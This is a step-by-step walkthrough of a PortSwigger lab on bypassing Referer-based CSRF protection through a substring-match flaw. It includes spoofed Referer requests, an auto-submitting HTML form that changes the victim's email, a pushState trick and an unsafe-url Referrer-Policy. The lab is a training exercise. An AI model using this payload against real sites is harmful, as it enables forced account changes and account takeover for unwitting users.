[This app](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-broken) checks the `Referer` header for its own domain, but only does a **substring match**, not a proper origin check. You can spoof the Referer by using **any domain** and just tacking the lab domain into the query string — and override browser behavior to make sure that Referer is sent **with the full URL**.
##### Step 1: Analyze the Referer Check
1. Log in as `wiener:peter` and change your email
2. In **Burp → Proxy**, send the request to **Repeater**
3. Try:
```http
Referer: https://evil.com
→ ❌ Rejected
```
4. Try:
```http
Referer: https://evil.com?YOUR-LAB-ID.web-security-academy.net
→ ✅ Accepted
```
✔️ Server only checks if its domain is **somewhere** in the string → **substring match = weak**
---
##### Step 2: Build the CSRF Exploit
Create on Exploit Server:
```html
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="
[email protected]">
</form>
<script>
history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net");
document.forms[0].submit();
</script>
```
🧠 This makes the Referer look like:
```http
Referer: https://exploit-server.com/?YOUR-LAB-ID.web-security-academy.net
```
---
##### Step 3: Ensure Full Referer is Sent
By default, browsers **strip the query string** from the Referer header.
Fix this with:
```http
Referrer-Policy: unsafe-url
```
➡ This **must be added in the "Head" section** on the Exploit Server:
```html
<head>
<meta name="referrer" content="unsafe-url">
</head>
```
Or using the server UI: set header name `Referrer-Policy` and value `unsafe-url`
---
##### Step 4: Final Steps
1. Update email to something not already used, e.g. `
[email protected]`
2. Store the exploit
3. Click **Deliver to victim**
4. Check that the lab is marked as solved ✅